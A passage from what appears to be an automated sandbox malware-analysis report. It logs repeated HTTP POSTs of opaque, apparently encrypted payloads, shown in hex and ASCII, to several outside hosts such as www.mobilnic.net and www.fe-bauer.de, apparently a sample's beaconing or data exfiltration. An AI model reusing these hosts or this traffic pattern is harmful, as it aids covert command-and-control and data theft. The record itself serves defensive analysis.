32 6d 62 5a 41 35 43 75 79 57 30 31 47 65 56 2b 76 31 69 46 50 46 4d 39 37 4f 62 4a 45 53 66 46 36 51 68 44 34 31 6e 77 6a 74 51 31 4c 75 46 61 46 4b 61 55 61 58 37 58 4d 77 34 78 64 6c 51 32 38 55 6e 6d 59 55 4b 72 56 59 4c 78 2f 6e 41 4f 30 4d 49 30 45 71 2b 50 41 56 78 37 5a 6c 61 31 55 56 59 30 4a 70 6d 4f 65 72 6c 36 72 59 41 6c 45 49 38 31 30 64 65 55 53 4a 53 2b 6e 56 51 45 6b 78 47 77 4d 30 53 44 55 75 33 36 61 77 6e 33 42 66 59 43 73 6b 74 42 65 71 62 72 50 44 65 6c 47 51 44 72 46 35 76 36 4c 68 77 50 5a 59 42 34 6c 70 58 76 73 6c 72 63 4a 57 45 52 58 6b 6c 30 67 59 66 59 32 70 36 4e 47 39 59 78 6a 79 72 43 33 68 4a 6a 65 4e 4b 37 70 36 43 4f 44 6e 53 49 6c 65 45 41 39 48 4f 50 32 45 6e 63 4c 38 45 4d 34 61 64 56 4b 77 58 32 45 79 49 4e 58 44 43 49 69 44 50 78 56 46 6d 43 31 67 45 5a 4d 62 46 51 50 6d 61 37 48 52 53 2b 42 31 5a 59 58 4b 78 36 75 31 77 77 47 72 55 35 78 64 52 59 65 7a 47 37 41 34 76 48 52 50 44 55 6a 52 6b 4b 42 77 78 31 67 31 79 42 47 30 57 74 64 6b 67 6b 48 64 46 6e 5a 79 74 54 59 77 3d 3d Data Ascii: /FmZm1WIotD2S9kBPL1O5063MuFjyvaUWZo67bVn0W1A6qjfbOZwbGE/VvYpTh3oIL5jzkodK95UAbf9YgY3ha72ig38SU02rpb72RUQG+tlRv5L1RfTQKwd67WEzQEohGaTM4YyDw1XtpJ0JpQhR9pTtGkDAlD6TvKV78/2lhqiwXiW5HjqaucPmKnzMRxfgwVD6f/bs6gYd6KJxV1ydGdQ7PxI2mbZA5CuyW01GeV+v1iFPFM97ObJESfF6QhD41nwjtQ1LuFaFKaUaX7XMw4xdlQ28UnmYUKrVYLx/nAO0MI0Eq+PAVx7Zla1UVY0JpmOerl6rYAlEI810deUSJS+nVQEkxGwM0SDUu36awn3BfYCsktBeqbrPDelGQDrF5v6LhwPZYB4lpXvslrcJWERXkl0gYfY2p6NG9YxjyrC3hJjeNK7p6CODnSIleEA9HOP2EncL8EM4adVKwX2EyINXDCIiDPxVFmC1gEZMbFQPma7HRS+B1ZYXKx6u1wwGrU5xdRYezG7A4vHRPDUjRkKBwx1g1yBG0WtdkgkHdFnZytTYw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 43 4c 38 4b 72 37 7a 5a 6d 74 43 67 52 4a 74 77 5a 2b 6c 6f 79 6b 39 30 36 53 68 55 59 51 76 6a 73 4f 34 44 45 33 41 4e 78 5a 46 31 6d 4e 6a 67 65 58 4e 47 55 35 62 32 55 59 33 43 32 65 41 4f 4d 53 62 53 6d 6c 6c 42 4e 7a 6d 33 4e 52 73 4a 42 72 62 46 75 4c 6e 41 31 32 57 73 34 38 43 65 64 45 4e 34 76 69 32 55 52 53 67 31 66 42 43 62 78 70 79 4a 4d 79 78 71 30 33 32 38 58 48 6c 7a 43 42 71 68 31 6a 6b 72 4e 33 6c 38 33 50 76 2b 4c 54 48 4e 68 47 51 63 62 49 55 4d 59 46 58 57 31 66 78 37 75 57 5a 50 55 69 70 6f 2b 55 44 4d 43 6f 34 71 67 42 47 54 71 77 43 71 36 52 43 68 31 32 71 37 44 48 71 78 2f 77 43 4a 32 35 4c 30 4a 42 68 4e 73 55 2f 30 44 4c 64 41 75 65 6e 35 4b 6f 73 30 67 41 46 64 41 37 53 58 33 55 4a 45 4f 43 46 32 47 4d 37 6a 66 52 47 4e 6d 6a 70 69 4b 68 73 35 68 66 50 65 61 54 4c 34 68 6d 32 48 4e 70 63 68 57 39 30 79 36 44 4e 49 36 47 51 4e 54 6e 5a 64 4d 55 59 37 4f 39 51 78 6d 54 75 73 4f 6c 51 7a 70 33 5a 7a 7a 4a 41 79 63 4d 77 74 78 4d 6f 75 2f 65 49 6b 79 48 68 75 56 45 45 70 6b 67 51 41 48 6f 71 76 63 4d 46 41 66 32 67 56 78 4d 64 4f 58 2f 68 4f 79 37 69 6a 51 52 69 56 72 4b 39 39 47 38 47 43 49 61 69 54 4e 69 32 76 7a 34 56 4c 5a 70 78 73 32 35 4d 4d 63 36 63 6e 4f 38 68 4d 4e 33 33 52 33 42 51 47 5a 6b 34 41 74 39 42 68 50 65 54 59 77 69 57 58 48 4b 52 75 58 76 6a 64 7a 52 33 47 50 37 6c 4b 74 39 47 4e 33 77 67 45 78 41 6b 79 6f 6f 77 79 6f 66 4e 50 48 75 55 45 62 69 6b 51 66 46 75 38 36 63 43 4c 76 50 58 68 47 78 30 50 53 43 4b 76 4c 45 2f 39 50 34 51 6c 70 71 4e 4a 65 42 71 76 74 59 51 36 68 6b 6a 43 4f 50 33 2f 66 37 57 50 39 78 70 4e 69 68 66 5a 6e 4e 4a 58 55 33 77 4c 30 77 77 6b 74 32 63 54 30 39 54 31 4d 2b 41 3d Data Ascii: CL8Kr7zZmtCgRJtwZ+loyk906ShUYQvjsO4DE3ANxZF1mNjgeXNGU5b2UY3C2eAOMSbSmllBNzm3NRsJBrbFuLnA12Ws48CedEN4vi2URSg1fBCbxpyJMyxq0328XHlzCBqh1jkrN3l83Pv+LTHNhGQcbIUMYFXW1fx7uWZPUipo+UDMCo4qgBGTqwCq6RCh12q7DHqx/wCJ25L0JBhNsU/0DLdAuen5Kos0gAFdA7SX3UJEOCF2GM7jfRGNmjpiKhs5hfPeaTL4hm2HNpchW90y6DNI6GQNTnZdMUY7O9QxmTusOlQzp3ZzzJAycMwtxMou/eIkyHhuVEEpkgQAHoqvcMFAf2gVxMdOX/hOy7ijQRiVrK99G8GCIaiTNi2vz4VLZpxs25MMc6cnO8hMN33R3BQGZk4At9BhPeTYwiWXHKRuXvjdzR3GP7lKt9GN3wgExAkyoowyofNPHuUEbikQfFu86cCLvPXhGx0PSCKvLE/9P4QlpqNJeBqvtYQ6hkjCOP3/f7WP9xpNihfZnNJXU3wL0wwkt2cT09T1M+A=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 2f 46 6d 5a 6d 31 57 49 6f 74 44 32 53 39 6b 42 50 4c 31 4f 35 30 36 33 4d 75 46 6a 79 76 61 55 57 5a 6f 36 37 62 56 6e 30 57 31 41 36 71 6a 66 62 4f 5a 77 62 47 45 2f 56 76 59 70 54 68 33 6f 49 4c 35 6a 7a 6b 6f 64 4b 39 35 55 41 62 66 39 59 67 59 33 68 61 37 32 69 67 33 38 53 55 30 32 72 70 62 37 32 52 55 51 47 2b 74 6c 52 76 35 4c 31 52 66 54 51 4b 77 64 36 37 57 45 7a 51 45 6f 68 47 61 54 4d 34 59 79 44 77 31 58 74 70 4a 30 4a 70 51 68 52 39 70 54 74 47 6b 44 41 6c 44 36 54 76 4b 56 37 38 2f 32 6c 68 71 69 77 58 69 57 35 48 6a 71 61 75 63 50 6d 4b 6e 7a 4d 52 78 66 67 77 56 44 36 66 2f 62 73 36 67 59 64 36 4b 4a 78 56 31 79 64 47 64 51 37 50 78 49 32 6d 62 5a 41 35 43 75 79 57 30 31 47 65 56 2b 76 31 69 46 50 46 4d 39 37 4f 62 4a 45 53 66 46 36 51 68 44 34 31 6e 77 6a 74 51 31 4c 75 46 61 46 4b 61 55 61 58 37 58 4d 77 34 78 64 6c 51 32 38 55 6e 6d 59 55 4b 72 56 59 4c 78 2f 6e 41 4f 30 4d 49 30 45 71 2b 50 41 56 78 37 5a 6c 61 31 55 56 59 30 4a 70 6d 4f 65 72 6c 36 72 59 41 6c 45 49 38 31 30 64 65 55 53 4a 53 2b 6e 56 51 45 6b 78 47 77 4d 30 53 44 55 75 33 36 61 77 6e 33 42 66 59 43 73 6b 74 42 65 71 62 72 50 44 65 6c 47 51 44 72 46 35 76 36 4c 68 77 50 5a 59 42 34 6c 70 58 76 73 6c 72 63 4a 57 45 52 58 6b 6c 30 67 59 66 59 32 70 36 4e 47 39 59 78 6a 79 72 43 33 68 4a 6a 65 4e 4b 37 70 36 43 4f 44 6e 53 49 6c 65 45 41 39 48 4f 50 32 45 6e 63 4c 38 45 4d 34 61 64 56 4b 77 58 32 45 79 49 4e 58 44 43 49 69 44 50 78 56 46 6d 43 31 67 45 5a 4d 62 46 51 50 6d 61 37 48 52 53 2b 42 31 5a 59 58 4b 78 36 75 31 77 77 47 72 55 35 78 64 52 59 65 7a 47 37 41 34 76 48 52 50 44 55 6a 52 6b 4b 42 77 78 31 67 31 79 42 47 30 57 74 64 6b 67 6b 48 64 46 6e 5a 79 74 54 59 77 3d 3d Data Ascii: /FmZm1WIotD2S9kBPL1O5063MuFjyvaUWZo67bVn0W1A6qjfbOZwbGE/VvYpTh3oIL5jzkodK95UAbf9YgY3ha72ig38SU02rpb72RUQG+tlRv5L1RfTQKwd67WEzQEohGaTM4YyDw1XtpJ0JpQhR9pTtGkDAlD6TvKV78/2lhqiwXiW5HjqaucPmKnzMRxfgwVD6f/bs6gYd6KJxV1ydGdQ7PxI2mbZA5CuyW01GeV+v1iFPFM97ObJESfF6QhD41nwjtQ1LuFaFKaUaX7XMw4xdlQ28UnmYUKrVYLx/nAO0MI0Eq+PAVx7Zla1UVY0JpmOerl6rYAlEI810deUSJS+nVQEkxGwM0SDUu36awn3BfYCsktBeqbrPDelGQDrF5v6LhwPZYB4lpXvslrcJWERXkl0gYfY2p6NG9YxjyrC3hJjeNK7p6CODnSIleEA9HOP2EncL8EM4adVKwX2EyINXDCIiDPxVFmC1gEZMbFQPma7HRS+B1ZYXKx6u1wwGrU5xdRYezG7A4vHRPDUjRkKBwx1g1yBG0WtdkgkHdFnZytTYw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 57 39 73 75 33 56 52 5a 6e 4e 44 6c 63 30 4d 4f 4c 2f 51 71 32 61 64 54 41 55 58 4d 56 44 34 39 79 42 50 57 46 4e 4e 4a 65 49 56 44 63 4b 41 6f 2b 71 78 6a 6b 35 70 36 79 4a 49 4d 45 69 58 35 38 74 50 4d 49 55 75 57 74 35 39 55 47 78 46 36 47 6a 67 39 55 76 57 5a 74 4c 6d 38 73 2f 4f 6f 51 7a 55 32 4c 52 52 2f 4c 4b 5a 78 45 59 78 54 77 72 67 6b 49 34 69 68 6a 48 48 2f 4e 54 4a 74 30 4a 61 47 34 6b 6e 76 44 35 6d 52 4d 58 70 56 54 39 53 57 64 4e 70 55 4c 4f 55 54 74 50 4a 4a 41 36 59 79 33 5a 43 63 33 75 6e 59 6a 48 73 4b 55 51 34 48 44 6b 5a 54 66 41 6c 65 48 32 2b 4a 74 72 75 52 72 52 37 58 7a 64 62 4d 62 4b 62 5a 39 66 4d 77 6f 4d 52 4a 58 4b 2f 43 74 63 70 71 7a 68 33 48 4e 52 4a 42 57 41 34 4f 75 66 2f 6b 4c 78 33 56 52 34 44 31 65 62 49 42 71 42 72 72 31 48 73 69 4b 6c 4b 30 33 6a 56 63 52 36 41 69 38 38 38 6a 77 2b 30 79 6a 76 4d 39 44 4d 76 50 6e 48 57 47 63 54 6a 50 63 6e 43 43 75 6d 42 4b 53 50 30 42 48 5a 45 65 65 6a 79 46 6c 4c 70 53 37 58 41 58 73 77 39 72 50 4a 4c 46 70 33 61 53 69 62 41 75 46 74 53 6c 46 71 56 4c 56 2b 51 6a 44 72 53 77 66 6c 47 67 4e 55 42 58 78 75 49 56 63 59 74 32 37 6c 54 31 47 2f 63 46 69 69 68 56 6a 65 35 45 70 64 31 39 46 34 2f 6a 54 7a 43 67 31 30 59 53 41 51 6c 48 4d 43 4c 30 4c 6c 56 4d 67 33 71 6d 5a 2f 6d 64 49 41 59 79 4f 62 41 35 6f 78 53 45 46 2f 63 65 35 53 70 2b 4a 5a 32 73 2f 5a 76 39 42 6f 39 4f 49 48 33 70 68 65 59 54 64 30 2f 6f 70 62 36 72 47 6f 41 50 59 77 30 2f 4b 54 59 55 30 67 53 49 43 35 65 61 73 37 41 66 41 66 52 47 76 4e 75 67 62 36 4e 4f 4b 50 33 6f 2f 68 6a 73 79 76 36 73 66 44 39 4d 49 37 76 53 4b 41 3d 3d Data Ascii: W9su3VRZnNDlc0MOL/Qq2adTAUXMVD49yBPWFNNJeIVDcKAo+qxjk5p6yJIMEiX58tPMIUuWt59UGxF6Gjg9UvWZtLm8s/OoQzU2LRR/LKZxEYxTwrgkI4ihjHH/NTJt0JaG4knvD5mRMXpVT9SWdNpULOUTtPJJA6Yy3ZCc3unYjHsKUQ4HDkZTfAleH2+JtruRrR7XzdbMbKbZ9fMwoMRJXK/Ctcpqzh3HNRJBWA4Ouf/kLx3VR4D1ebIBqBrr1HsiKlK03jVcR6Ai888jw+0yjvM9DMvPnHWGcTjPcnCCumBKSP0BHZEeejyFlLpS7XAXsw9rPJLFp3aSibAuFtSlFqVLV+QjDrSwflGgNUBXxuIVcYt27lT1G/cFiihVje5Epd19F4/jTzCg10YSAQlHMCL0LlVMg3qmZ/mdIAYyObA5oxSEF/ce5Sp+JZ2s/Zv9Bo9OIH3pheYTd0/opb6rGoAPYw0/KTYU0gSIC5eas7AfAfRGvNugb6NOKP3o/hjsyv6sfD9MI7vSKA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 4a 55 4c 45 42 54 55 4b 6a 64 41 51 31 44 5a 78 6e 4a 62 57 42 43 37 77 72 71 4c 44 6b 57 62 61 4f 55 6f 65 76 7a 56 7a 45 6a 77 39 4a 50 77 52 36 32 63 5a 72 30 5a 43 53 62 49 6c 36 6b 56 50 45 38 4b 75 49 74 50 61 52 46 72 68 6f 56 68 37 41 6e 66 6f 79 4a 37 70 4c 53 56 4d 6f 63 77 59 36 6d 57 69 36 65 2f 51 35 4a 33 69 62 59 4a 48 47 49 53 30 6d 58 73 38 37 73 63 32 66 6f 65 75 6f 42 62 2f 2b 4b 69 31 7a 44 73 32 55 42 76 51 57 53 32 6f 70 4c 42 49 59 74 6f 7a 32 66 38 49 44 31 52 6b 35 6e 4e 72 73 2f 2f 53 79 30 46 6a 46 4f 43 6d 2f 44 4f 65 33 6b 49 5a 2f 4d 65 2f 55 49 4f 4f 78 70 62 6f 68 37 6a 51 43 66 7a 59 77 70 77 56 4c 6b 42 4e 49 68 77 6d 35 54 44 47 6d 48 49 6b 47 43 38 35 32 54 64 6f 50 4e 50 38 50 57 61 32 72 43 66 54 74 47 50 79 75 50 78 35 50 45 6d 79 64 6b 74 67 63 65 53 77 41 62 6f 6c 38 4b 50 57 6c 51 46 2b 2b 34 72 63 6d 43 31 47 53 32 70 48 67 46 48 77 4b 7a 45 4f 64 2f 78 5a 59 75 50 33 6f 44 4b 72 32 41 62 39 32 37 35 39 75 35 65 4f 34 7a 66 7a 70 72 2b 49 2f 44 56 37 2b 75 67 74 70 38 64 50 35 50 71 4d 75 52 32 6e 4b 44 48 6c 68 4c 43 46 77 44 51 4f 44 36 6b 69 73 70 6a 4d 4d 4e 6e 73 4d 45 36 4a 58 72 30 50 2f 45 6b 59 50 4d 31 59 7a 47 2b 48 63 78 38 56 34 53 39 51 46 57 59 37 5a 69 63 36 41 30 32 6e 75 36 79 70 4e 47 61 35 69 5a 44 4a 67 6f 6b 46 47 6d 50 61 43 54 2f 57 62 6f 4d 4c 58 42 57 2f 65 6c 67 51 4e 66 77 4f 4a 57 63 61 62 68 71 34 35 4f 30 33 33 63 68 49 6b 6d 6a 33 7a 34 36 66 77 75 42 64 63 37 6f 69 47 68 57 5a 6f 2f 54 30 53 43 6d 6a 53 66 43 43 53 5a 6e 6f 33 35 4a 53 37 45 46 68 79 41 43 6a 37 31 59 59 6d 6d 55 55 43 7a 6c 53 35 4a 37 48 30 6f 5a 66 4a 7a 4a 67 67 57 36 4c 7a 35 33 58 71 38 65 57 31 4f 71 37 79 46 30 66 64 5a 33 62 55 67 36 38 51 4b 67 53 Data Ascii: JULEBTUKjdAQ1DZxnJbWBC7wrqLDkWbaOUoevzVzEjw9JPwR62cZr0ZCSbIl6kVPE8KuItPaRFrhoVh7AnfoyJ7pLSVMocwY6mWi6e/Q5J3ibYJHGIS0mXs87sc2foeuoBb/+Ki1zDs2UBvQWS2opLBIYtoz2f8ID1Rk5nNrs//Sy0FjFOCm/DOe3kIZ/Me/UIOOxpboh7jQCfzYwpwVLkBNIhwm5TDGmHIkGC852TdoPNP8PWa2rCfTtGPyuPx5PEmydktgceSwAbol8KPWlQF++4rcmC1GS2pHgFHwKzEOd/xZYuP3oDKr2Ab92759u5eO4zfzpr+I/DV7+ugtp8dP5PqMuR2nKDHlhLCFwDQOD6kispjMMNnsME6JXr0P/EkYPM1YzG+Hcx8V4S9QFWY7Zic6A02nu6ypNGa5iZDJgokFGmPaCT/WboMLXBW/elgQNfwOJWcabhq45O033chIkmj3z46fwuBdc7oiGhWZo/T0SCmjSfCCSZno35JS7EFhyACj71YYmmUUCzlS5J7H0oZfJzJggW6Lz53Xq8eW1Oq7yF0fdZ3bUg68QKgS
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 44 59 39 66 34 52 32 39 76 64 44 4b 35 46 76 68 56 42 74 41 35 31 5a 76 34 44 33 4c 51 75 52 35 6f 54 2f 4c 67 38 4f 46 54 63 35 75 72 6a 4e 70 31 54 34 35 38 73 6a 65 7a 57 78 6b 69 41 66 6e 35 39 53 71 50 33 31 72 32 2b 67 39 59 51 46 52 70 45 5a 4e 55 76 41 6c 4e 6f 6b 52 35 6d 59 71 75 39 36 68 46 31 4d 34 6d 2b 50 66 61 5a 4f 66 4f 35 32 68 72 55 4c 45 78 6c 72 50 37 74 78 66 36 63 54 43 63 4a 48 57 42 36 6b 7a 79 6c 70 46 4e 75 41 6c 59 34 58 73 44 72 57 30 79 43 4d 56 35 62 4c 6e 74 6a 2b 57 33 53 50 4f 74 63 57 6b 52 32 4b 76 68 42 63 6c 46 36 50 6b 6e 6f 78 47 6c 79 39 6c 52 37 74 66 49 5a 4a 45 78 61 48 4e 43 43 49 79 57 30 53 6e 45 63 7a 31 54 6c 59 70 79 6e 72 6c 77 4f 6c 5a 49 35 70 4a 41 69 72 52 4e 4e 43 6e 45 4f 59 44 48 55 38 49 34 49 35 4d 34 57 6c 77 6f 57 33 4a 66 57 4d 54 53 4b 35 78 30 42 34 59 35 56 4f 41 48 78 52 76 63 5a 77 4d 79 70 44 41 49 36 70 30 63 39 78 33 5a 4d 6c 70 49 42 46 53 76 68 33 4b 50 2b 4d 52 4e 45 6d 57 50 6b 62 6a 57 50 73 77 63 71 6f 39 75 45 55 41 7a 32 62 6d 52 32 62 37 38 64 50 6a 61 36 63 5a 68 4e 57 65 44 51 58 36 45 42 36 66 56 50 5a 56 74 61 65 5a 75 69 32 36 4e 59 63 56 45 59 73 55 5a 33 5a 6d 64 78 4f 44 77 52 6d 57 71 64 55 2b 31 7a 36 4d 79 6e 6b 73 53 59 30 34 58 36 6a 5a 6b 46 79 52 61 4c 7a 70 54 4a 79 6c 54 6e 48 73 6a 78 2f 52 68 6a 2b 64 6f 39 59 63 66 46 38 57 39 5a 6c 6b 6a 4f 61 59 47 74 7a 6a 53 4b 36 71 53 30 67 78 36 33 72 5a 6f 76 41 51 77 78 48 4b 46 58 50 64 78 77 39 4d 57 41 66 76 36 47 52 62 55 53 6a 65 2b 53 2b 2f 73 39 30 52 50 4e 46 74 72 72 75 37 39 75 52 49 78 64 76 46 69 72 6f 45 53 49 56 35 2f 78 38 73 42 6c 59 3d Data Ascii: DY9f4R29vdDK5FvhVBtA51Zv4D3LQuR5oT/Lg8OFTc5urjNp1T458sjezWxkiAfn59SqP31r2+g9YQFRpEZNUvAlNokR5mYqu96hF1M4m+PfaZOfO52hrULExlrP7txf6cTCcJHWB6kzylpFNuAlY4XsDrW0yCMV5bLntj+W3SPOtcWkR2KvhBclF6PknoxGly9lR7tfIZJExaHNCCIyW0SnEcz1TlYpynrlwOlZI5pJAirRNNCnEOYDHU8I4I5M4WlwoW3JfWMTSK5x0B4Y5VOAHxRvcZwMypDAI6p0c9x3ZMlpIBFSvh3KP+MRNEmWPkbjWPswcqo9uEUAz2bmR2b78dPja6cZhNWeDQX6EB6fVPZVtaeZui26NYcVEYsUZ3ZmdxODwRmWqdU+1z6MynksSY04X6jZkFyRaLzpTJylTnHsjx/Rhj+do9YcfF8W9ZlkjOaYGtzjSK6qS0gx63rZovAQwxHKFXPdxw9MWAfv6GRbUSje+S+/s90RPNFtrru79uRIxdvFiroESIV5/x8sBlY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 4c 79 46 6b 34 55 4f 39 76 64 41 6c 71 57 61 72 53 6b 45 46 36 32 77 73 50 72 44 70 31 4c 74 2b 4a 31 2f 6a 36 32 57 61 73 48 62 52 64 70 50 59 6e 41 30 5a 63 65 6b 6e 45 58 43 71 5a 39 42 36 42 56 71 45 7a 68 4a 6f 63 66 39 41 70 4c 39 6b 42 4e 4d 4a 55 66 32 46 74 45 6e 65 52 57 53 6c 34 42 68 2b 4c 31 55 7a 39 44 38 37 4d 4d 66 4f 6d 32 2b 67 4c 68 79 64 71 30 58 2b 49 73 42 75 2b 36 47 51 47 4e 52 59 47 51 72 73 77 51 30 56 47 61 71 48 30 41 6b 34 76 52 64 37 58 57 62 4d 61 65 66 5a 52 54 6b 68 63 32 37 68 4a 45 34 46 79 6a 39 32 50 5a 65 38 56 45 6d 66 45 74 32 64 42 54 76 4e 32 4b 50 44 35 73 63 58 63 66 50 4c 63 76 32 56 5a 66 6a 4f 58 44 7a 67 39 45 41 71 50 68 67 70 46 75 65 49 68 4c 75 71 4b 4f 6b 41 37 44 76 66 5a 61 67 4c 79 78 56 69 63 30 70 65 38 2f 73 49 53 52 57 77 37 56 6c 74 39 50 4b 35 52 47 4a 4d 66 69 38 74 74 46 75 31 4e 46 44 56 31 50 45 32 48 4e 33 64 43 64 43 69 76 67 38 31 76 37 32 43 64 68 58 77 77 6e 77 6d 48 71 69 66 49 74 46 52 4c 74 4c 62 67 2f 34 6a 32 2f 7a 61 37 43 69 73 37 71 72 78 69 56 55 79 75 33 62 4a 2b 34 4f 47 58 50 4f 6b 4f 65 36 48 61 67 67 62 44 4c 41 37 6a 66 71 6f 41 70 78 53 6d 6e 76 45 58 45 75 52 61 77 50 49 41 46 48 4a 2f 39 71 59 61 71 53 57 2f 57 32 76 61 55 75 65 66 68 38 7a 31 67 43 56 43 4f 72 63 66 4a 48 31 52 41 72 48 51 48 65 6f 62 77 4a 46 63 54 68 76 51 68 75 4c 6f 6a 43 46 30 72 31 69 73 59 6c 64 78 54 4d 33 63 51 6a 65 4d 55 65 34 73 42 4b 43 6e 51 47 6b 76 37 36 38 6d 69 59 75 4d 45 57 4d 4a 74 53 56 64 62 58 54 74 66 76 4b 69 77 56 38 4e 62 39 78 50 78 49 71 52 46 56 50 79 38 66 6c 6e 46 39 58 35 38 73 53 51 79 53 41 4e 51 51 74 4d 57 4f 47 78 71 74 66 32 32 66 37 6f 38 61 52 36 59 72 5a 6d 74 57 42 42 70 6f 6c 5a 2f 49 3d Data Ascii: LyFk4UO9vdAlqWarSkEF62wsPrDp1Lt+J1/j62WasHbRdpPYnA0ZceknEXCqZ9B6BVqEzhJocf9ApL9kBNMJUf2FtEneRWSl4Bh+L1Uz9D87MMfOm2+gLhydq0X+IsBu+6GQGNRYGQrswQ0VGaqH0Ak4vRd7XWbMaefZRTkhc27hJE4Fyj92PZe8VEmfEt2dBTvN2KPD5scXcfPLcv2VZfjOXDzg9EAqPhgpFueIhLuqKOkA7DvfZagLyxVic0pe8/sISRWw7Vlt9PK5RGJMfi8ttFu1NFDV1PE2HN3dCdCivg81v72CdhXwwnwmHqifItFRLtLbg/4j2/za7Cis7qrxiVUyu3bJ+4OGXPOkOe6HaggbDLA7jfqoApxSmnvEXEuRawPIAFHJ/9qYaqSW/W2vaUuefh8z1gCVCOrcfJH1RArHQHeobwJFcThvQhuLojCF0r1isYldxTM3cQjeMUe4sBKCnQGkv768miYuMEWMJtSVdbXTtfvKiwV8Nb9xPxIqRFVPy8flnF9X58sSQySANQQtMWOGxqtf22f7o8aR6YrZmtWBBpolZ/I=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 44 59 39 66 34 52 32 39 76 64 44 4b 35 46 76 68 56 42 74 41 35 31 5a 76 34 44 33 4c 51 75 52 35 6f 54 2f 4c 67 38 4f 46 54 63 35 75 72 6a 4e 70 31 54 34 35 38 73 6a 65 7a 57 78 6b 69 41 66 6e 35 39 53 71 50 33 31 72 32 2b 67 39 59 51 46 52 70 45 5a 4e 55 76 41 6c 4e 6f 6b 52 35 6d 59 71 75 39 36 68 46 31 4d 34 6d 2b 50 66 61 5a 4f 66 4f 35 32 68 72 55 4c 45 78 6c 72 50 37 74 78 66 36 63 54 43 63 4a 48 57 42 36 6b 7a 79 6c 70 46 4e 75 41 6c 59 34 58 73 44 72 57 30 79 43 4d 56 35 62 4c 6e 74 6a 2b 57 33 53 50 4f 74 63 57 6b 52 32 4b 76 68 42 63 6c 46 36 50 6b 6e 6f 78 47 6c 79 39 6c 52 37 74 66 49 5a 4a 45 78 61 48 4e 43 43 49 79 57 30 53 6e 45 63 7a 31 54 6c 59 70 79 6e 72 6c 77 4f 6c 5a 49 35 70 4a 41 69 72 52 4e 4e 43 6e 45 4f 59 44 48 55 38 49 34 49 35 4d 34 57 6c 77 6f 57 33 4a 66 57 4d 54 53 4b 35 78 30 42 34 59 35 56 4f 41 48 78 52 76 63 5a 77 4d 79 70 44 41 49 36 70 30 63 39 78 33 5a 4d 6c 70 49 42 46 53 76 68 33 4b 50 2b 4d 52 4e 45 6d 57 50 6b 62 6a 57 50 73 77 63 71 6f 39 75 45 55 41 7a 32 62 6d 52 32 62 37 38 64 50 6a 61 36 63 5a 68 4e 57 65 44 51 58 36 45 42 36 66 56 50 5a 56 74 61 65 5a 75 69 32 36 4e 59 63 56 45 59 73 55 5a 33 5a 6d 64 78 4f 44 77 52 6d 57 71 64 55 2b 31 7a 36 4d 79 6e 6b 73 53 59 30 34 58 36 6a 5a 6b 46 79 52 61 4c 7a 70 54 4a 79 6c 54 6e 48 73 6a 78 2f 52 68 6a 2b 64 6f 39 59 63 66 46 38 57 39 5a 6c 6b 6a 4f 61 59 47 74 7a 6a 53 4b 36 71 53 30 67 78 36 33 72 5a 6f 76 41 51 77 78 48 4b 46 58 50 64 78 77 39 4d 57 41 66 76 36 47 52 62 55 53 6a 65 2b 53 2b 2f 73 39 30 52 50 4e 46 74 72 72 75 37 39 75 52 49 78 64 76 46 69 72 6f 45 53 49 56 35 2f 78 38 73 42 6c 59 3d Data Ascii: DY9f4R29vdDK5FvhVBtA51Zv4D3LQuR5oT/Lg8OFTc5urjNp1T458sjezWxkiAfn59SqP31r2+g9YQFRpEZNUvAlNokR5mYqu96hF1M4m+PfaZOfO52hrULExlrP7txf6cTCcJHWB6kzylpFNuAlY4XsDrW0yCMV5bLntj+W3SPOtcWkR2KvhBclF6PknoxGly9lR7tfIZJExaHNCCIyW0SnEcz1TlYpynrlwOlZI5pJAirRNNCnEOYDHU8I4I5M4WlwoW3JfWMTSK5x0B4Y5VOAHxRvcZwMypDAI6p0c9x3ZMlpIBFSvh3KP+MRNEmWPkbjWPswcqo9uEUAz2bmR2b78dPja6cZhNWeDQX6EB6fVPZVtaeZui26NYcVEYsUZ3ZmdxODwRmWqdU+1z6MynksSY04X6jZkFyRaLzpTJylTnHsjx/Rhj+do9YcfF8W9ZlkjOaYGtzjSK6qS0gx63rZovAQwxHKFXPdxw9MWAfv6GRbUSje+S+/s90RPNFtrru79uRIxdvFiroESIV5/x8sBlY=
